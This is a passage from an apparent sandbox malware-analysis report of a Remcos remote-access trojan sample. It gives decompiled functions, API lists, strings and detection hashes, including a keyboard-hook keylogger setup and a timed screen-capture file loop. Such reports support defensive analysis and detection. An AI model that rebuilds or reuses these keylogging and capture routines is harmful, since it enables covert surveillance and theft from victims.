				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						L00413D37(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						L00401EDA(_t146 - 0x80, _t66, _t145, E00403086(_t92, _t146 - 0x58, E00403086(_t92, _t146 - 0x40, E00407516(_t146 - 0x98, 0x46c868, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						L00401ED0();
						L00401ED0();
						L00401ED0();
						_t72 = L00401ECB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0041510D(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00436079(_t75, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00436079(_t79, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = L00401F75(L00401E29(0x46c578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040425F(_t92, _t148, _t83);
						_t85 = E00417417(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}

APIs

__EH_prolog.LIBCMT ref: 004152DC
GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041530E

Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531

Part of subcall function 0041510D: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041539A
Sleep.KERNEL32(000003E8), ref: 00415420
GetLocalTime.KERNEL32(?), ref: 00415428
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415517

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 004153BD, 004153DE, 0041544C
time_%04i%02i%02i_%02i%02i%02i, xrefs: 004153C2

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 649275306-3790400642
Opcode ID: b7cd92589d8d1aabb47beff9a7ba087f3d58a61c122a24d20020f3e57d9b48ef
Instruction ID: 36c87be1b18ce6efe71a969fa5af4a68c9604fdc2ab21ef0b6733f40622ad6ee
Opcode Fuzzy Hash: b7cd92589d8d1aabb47beff9a7ba087f3d58a61c122a24d20020f3e57d9b48ef
Instruction Fuzzy Hash: 2F518070A001589ACB14BBB6DC52AFE7769AB55309F40003FF845A72E2EF3C5E85C799

Uniqueness

Uniqueness Score: -1.00%

Function 004437EC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004437EC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46a00c; // 0x3dad585e
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0043E036(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E004422AE( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E004422AE();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x443f61
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x443f61
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0042F61B(_v8 ^ _t136);
			}

0x004437f4
0x004437fb
0x004437fe
0x00443806
0x0044380a
0x00443816
0x00443819
0x0044381c
0x00443823
0x0044382b
0x0044382e
0x00443834
0x0044383a
0x0044383f
0x00443841
0x00443844
0x00443849
0x00443853
0x0044385a
0x0044385d
0x00443864
0x0044386b
0x00443897
0x004438bd
0x004438bf
0x00000000
0x00443899
0x0044389c
0x00443963
0x0044396f
0x0044397a
0x0044397f
0x004438a2
0x004438a9
0x004438ae
0x004438b4
0x004438ba
0x00000000
0x004438ba
0x004438b4
0x0044389c
0x0044386d
0x00443871
0x00443874
0x0044387a
0x0044387c
0x0044387f
0x00443883
0x004438c0
0x004438c3
0x004438c4
0x004438c9
0x004438cf
0x004438d5
0x004438e4
0x004438ea
0x004438f0
0x004438f5
0x004438fd
0x00443911
0x00443984
0x0044398a
0x00443913
0x0044391b
0x00443924
0x0044392a
0x00000000
0x0044392c
0x0044392e
0x00443931
0x00443935
0x0044394a
0x00000000
0x0044394c
0x00443950
0x00443952
0x00443955
0x00000000
0x00443955
0x00443950
0x0044394a
0x0044392a
0x00443924
0x00443911
0x004438f5
0x004438cf
0x00000000
0x00443958
0x00443958
0x0044398c
0x0044399e

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00443F61,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044382E
__fassign.LIBCMT ref: 004438A9
__fassign.LIBCMT ref: 004438C4
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 004438EA
WriteFile.KERNEL32(?,FF8BC35D,00000000,a?D,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443909
WriteFile.KERNEL32(?,?,00000001,a?D,00000000,?,?,?,?,?,?,?,?,?,00443F61,?), ref: 00443942

Strings

a?D, xrefs: 004438FD, 00443935, 00443900, 00443938

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: a?D
API String ID: 1324828854-2671499184
Opcode ID: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
Instruction ID: 2257eea9d661a44ad8950c31b3f1cc9a1c274aacc0cefe8ff3c2634c143855f4
Opcode Fuzzy Hash: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
Instruction Fuzzy Hash: 2951D0B0A006099FDB14CFA8D881AEEFBF8EF09701F14406BE941E7251E3749A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00408894, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408894(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46baf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E0040887D, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E00416B7E(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E004075C4(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00402064(_t22, _t39 - 0x14, "[ERROR]");
						E004165D8(_t22, 0);
						L00401FA7();
						_t8 = 1;
					}
				}
				return _t8;
			}

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AF
SetWindowsHookExA.USER32 ref: 004088BD
GetLastError.KERNEL32 ref: 004088C9

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

GetMessageA.USER32 ref: 00408917
TranslateMessage.USER32(?), ref: 00408926
DispatchMessageA.USER32 ref: 00408931

Strings

[ERROR], xrefs: 004088EF
Keylogger initialization failure: error , xrefs: 004088DD

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $[ERROR]
API String ID: 3219506041-2451335947
Opcode ID: 18efa55e4c0aa19a37e2247e024f1a1e12fd5720c569a994fc46527ab49f1f09
Instruction ID: 45d1f3c5768472935d8da96a5f04b23d1a91758f3c86bb8fdf5143b2996172c8
Opcode Fuzzy Hash: 18efa55e4c0aa19a37e2247e024f1a1e12fd5720c569a994fc46527ab49f1f09
Instruction Fuzzy Hash: 8F119DB25002016BC7207BB69D09C6B77ACEA95752B50053EB885D2191EF38DA04C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 00418680, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418680(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46bec4 = E00418732();
				0x46bec0->cbSize = 0x1fc;
				 *0x46bec8 = 1;
				 *0x46bed0 = 0x401;
				 *0x46bed4 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46bed8, "Remcos", 0x80);
				 *0x46becc = 7;
				Shell_NotifyIconA(0, 0x46bec0);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}

0x00418699
0x004186a4
0x004186b2
0x004186bc
0x004186c6
0x004186e5
0x004186ea
0x004186f6
0x00418700
0x0041871c
0x00418723
0x0041872b
0x00000000
0x00000000
0x0041870c
0x00418716
0x00418716
0x00418731

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418699

Part of subcall function 00418732: RegisterClassExA.USER32(00000030), ref: 0041877E
Part of subcall function 00418732: CreateWindowExA.USER32 ref: 00418799
Part of subcall function 00418732: GetLastError.KERNEL32 ref: 004187A3

ExtractIconA.SHELL32(00000000,?,00000000), ref: 004186D0
lstrcpynA.KERNEL32(0046BED8,Remcos,00000080), ref: 004186EA
Shell_NotifyIconA.SHELL32(00000000,0046BEC0), ref: 00418700
TranslateMessage.USER32(?), ref: 0041870C
DispatchMessageA.USER32 ref: 00418716
GetMessageA.USER32 ref: 00418723

Strings

Remcos, xrefs: 004186DB

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
Instruction ID: 76f610ea089cdd7666bb47ab7eed5b25d2d074ad51cd5b102639d92569b498d2
Opcode Fuzzy Hash: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
Instruction Fuzzy Hash: 98011EB1900308ABD7109FA1EC0CEDA7BBCFB85747F10006AF615D2161EBF995858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004450E7, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004450E7(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = L00439E01();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(L00439E14())) = 9;
						L59:
						_t145 = E0043626D();
						goto L60;
					}
					__eflags = _t213 -  *0x46ba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0043E61D(_t224, _t158);
								L0043EE85(0);
								L0043EE85(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0044471C(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044D987(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													L00439DDE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(L00439E14())) = 9;
											 *(L00439E01()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00444C43();
												} else {
													_t176 = L00444F53();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = L00444E03(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(L00439E14())) = 0xc;
									 *(L00439E01()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									L0043EE85(_t246);
									return _t242;
								}
							}
							L15:
							 *(L00439E01()) =  *_t206 & _t246;
							 *((intOrPtr*)(L00439E14())) = 0x16;
							E0043626D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(L00439E01()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(L00439E14())) = 0x16;
					goto L59;
				} else {
					 *(L00439E01()) =  *_t212 & 0x00000000;
					_t145 = L00439E14();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9bd4cba7261bb85346107ed43908dd6911e5a0a1b87e865910dd67f9eedc0de
Instruction ID: d415aa42f168db04541a2b881a195995a4068d2056edb743f6be97fc2ac4bfb3
Opcode Fuzzy Hash: d9bd4cba7261bb85346107ed43908dd6911e5a0a1b87e865910dd67f9eedc0de
Instruction Fuzzy Hash: A1C10971D04749AFEF11DFA9C841BAEBBB4AF09304F18009AE8149B393D7789D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044DA45, Relevance: 13.8, APIs: 9, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044DA45(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46a00c; // 0x3dad585e
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = L0043EE69(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = L0043EE69(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0043E61D(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00450080();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
